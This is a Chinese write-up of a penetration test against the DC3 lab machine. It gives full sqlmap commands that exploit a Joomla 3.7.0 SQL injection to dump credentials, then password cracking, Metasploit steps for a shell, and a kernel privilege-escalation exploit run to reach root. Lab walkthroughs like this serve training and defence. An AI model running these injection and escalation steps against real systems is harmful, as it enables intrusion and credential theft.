DC3靶机渗透测试

news/2024/12/11 17:15:53/文章来源:https://www.cnblogs.com/cll-wlaq/p/18600035

*概述*

*测试目的*

*测试范围*

序号 系统 IP
1 本地 192.168.152.128
2 靶机 192.168.152.133

*详细测试流程*

*1、发现测试目标*

img

*2、信息收集*

img

开放了80端口,是Joomla服务

扫描目录

img

利用joomscan工具探测服务版本

Joomscan工具利用方法:

https://cn.linux-console.net/?p=10704

Joomscan –url http://192.168.12.133

img

*3、漏洞利用*

搜索joomla 3.7.0版本漏洞,这里利用第一个sql注入的漏洞,用-m参数下载到本地目录

img

查看相关payload

img

-u参数指定url地址,--risk=3代表扫描的力度,--dbs列出所有的数据库,-p指定漏洞参数点https://blog.csdn.net/bua200720411091/article/details/133816482(sqlmap用法)

img

得到数据库,这里我们利用第二个

img

sqlmap -u "http://192.168.152.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --tables -D "joomladb"

得到了很多的表,我们用#_users表

img

sqlmap -u "http://192.168.152.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

得到字段

img

sqlmap -u "http://192.168.152.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" –C “username,password” --dump -p list[fullordering]

img

把密码保存到一个文件里面,用john破解密码

img

img

那么就知道admin的密码就是snoopy

登录后台http://192.168.152.133/administrator/

登录后台以后可以尝试寻找上传点上传木马文件。但是我们这里直接使用msf一步化到位

使用第6个

img

获得一个会话以后进入shell

img

img

使用python稳定化shell,获得交互式shell

img

msfconsole

search joomla

use 6

set rhosts 10.1.2.148

exploit

尝试suid提权

img

没有成功

尝试内核提权

img

searchsploit Ubuntu 16.04

img

img

-x参数是查看的意思,-m参数就是下载到本地

img

用wget下载

img

将下载的payload上传到目标上面

lpwd显示本地目录

upload file1 file2 将本地的file1上传到目标的当前目录下面并且可以重命名为file2

img

*4、提权*

上传完成以后解压

img

进入39772目录

解压exploit.tar ,用tar –xf命令

解压完成以后进入名字最长的那个目录

然后根据之前看到的用法

先运行compile.sh,在运行doubleput

根据运行结果可知,compile.sh就是对c文件进行批量编译的可执行文件

img

img

运行doubleput,过一会就可以获得root权限

获得最终的flag

img

*漏洞详情和修复建议*

风险评级
漏洞描述:joomlaSQl注入 High
漏洞影响:泄露账号密码等敏感信息,
修复建议:加强过滤
风险评级
漏洞描述:joomlaGetshell High
漏洞影响:被直接获取www-data权限甚至被提权
修复建议:无

*测试结果综述*

先用nmap扫描发现80端口的joomla服务,接着用joomscan扫描获得后台地址以及服务版本,利用searchsploit搜素利用其中一个SQL注入漏洞获得管理员账号密码,在这个地方可以在templates/bezz3/html上传一个用msfvenom生成的php木马,然后做好监听可以获得一个反向shell,但是有更简单的方法,就是在msfconsole里面搜索joomla相关漏洞,利用sqli_rce那个可以一步到位获得一个www-data的shell.然后后面尝试了suid、sudo提权失败,利用/etc/issus文件信息获得内核版本,再次利用searchsploit搜素相关历史漏洞,最后下载payload,上传paylaod,几次解压,然后编译c文件,运行获得root权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/850939.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CFS靶机三层(1)

*搭建环境* *下载解压* 【网盘链接】https://pan.baidu.com/s/1slqp3878JawT_QDrzyC7Ig?pwd=9da6 靶场就在刚才的网盘链接中,下载之后有很多个7z文件,按照下面的步骤合并解压 下载完是很多个7z格式的压缩文件,直接合并解压就行,就是用 copy /b CFS三层靶机环境.7z* 靶机.7…

集合基础案例

1.案例一答:2.案例二对于该案例,我们首先是要创建学生类,否则集合的泛型会不知道该怎么填创建完学生对象,在创建集合,走后面的流程,注意,这个案例有个易错点 如图我们在集合中存入的是什么类型的数据,取出来的就是什么类型的数据,所以,打印的每个stu都是学生对象,而…

powershell配置

powershell配置 0.结果展示1.配置输出符号 function Prompt {$curdir = "$(Get-Location)".Split("\") | Select-Object -Last 1return "⚡" + $curdir + "💨" }先创建函数 函数中创建变量$curdir写入路径;路径由Split以“\”分割,…

【推荐算法】单目标精排模型——DIEN

key word: 阿里巴巴,广告点击率预测 Motivation: 截至2018年,还没有相关的推荐算法考虑到用户兴趣的趋势。作者认为大多数的模型是直接将行为视为兴趣,无法直接提取用户真正的潜在兴趣特征。因此,作者提出了DIEN模型,利用interest extractor layer通过用户历史行为序列捕…

datagridview点击列头对当前列进行排序的功能无效

DataGridView 的默认行为是支持通过单击列头对列进行排序,但在以下情况下可能会取消该功能或无法使用: 1. 绑定的数据源不支持排序 如果 DataGridView 的数据源是绑定到一个不支持排序的集合(例如,List 或未实现 IBindingList 的对象),排序功能会被禁用。 2. 列的 SortMo…

Salesforce Q3财报:营收94亿美金,净利润同比增长25%,靠什么实现逆风翻盘?

Salesforce在发布第三季度财报后,其股价迎来了久违的高光时刻。周三上午,Salesforce股票(CRM)报收367美元,较前一交易日的331.43美元上涨了10%,一跃成为市场关注的焦点。 本季度我们在收入、利润率、现金流和cRPO等各项财务指标上再次实现了卓越的表现。Agentforce,作为…

c# 创建Access数据库文件,并创建表,增加一行数据

需求:每隔一段时间存一条数据到Access数据库,数据库文件以日期命名,把这个功能封装以供调用 分解任务:1新建数据库文件 2新建数据库表 3向数据库表中增加数据 4需要有日志记录执行结果 5由于过多的dll不易于传播维护,需要将这些dll封装 参考资料: 关闭ADOX.Catalo…

转载:【AI系统】AI 系统与程序代码关系

模型算法的开发者一般会通过使用 AI 框架提供 Python 等高级语言的 API,来编写对应的 AI 算法,而 AI 算法的底层系统问题被当前层抽象隐藏。到底在代码背后 AI 系统的每一层发生和执行了什么?有哪些有意思的系统设计问题? 本文我们将从一个具体的 PyTorch 实现一个 LeNet5 …

VUE使用Canvas元素实现手绘签名(重新签名+撤回一笔)

VUE使用Canvas元素实现手绘签名(重新签名+撤回一笔) 效果:代码实现:本文来自博客园,作者:じ逐梦,转载请注明原文链接:https://www.cnblogs.com/ZhuMeng-Chao/p/18599924

雷池社区版的防爬虫功能之Bot 防护 - 人机验证

​ 介绍 互联网上有来自真人用户的流量, 但更多的是由爬虫, 漏洞扫描器, 蠕虫病毒, 漏洞利用程序等自动化程序发起的流量. 识别真人用户对提升网站的安全性至关重要, 也是防爬虫, 防扫描的关键. 该功能开启后,当用户访问您的网站时,雷池会预先检查客户端环境的合法性,如下图…

精美的jQuery科学计算器插件

jsRapCalculator是一款jQuery科学计算器插件。该科学计算器提供除加减乘除外,还有或和异或、取反、八进制,十六进制和二进制等功能。在线演示 下载使用方法 在页面中引入jquery和jsRapCalculator.js文件和样式文件jsRapCalculator.css。<link rel="stylesheet"…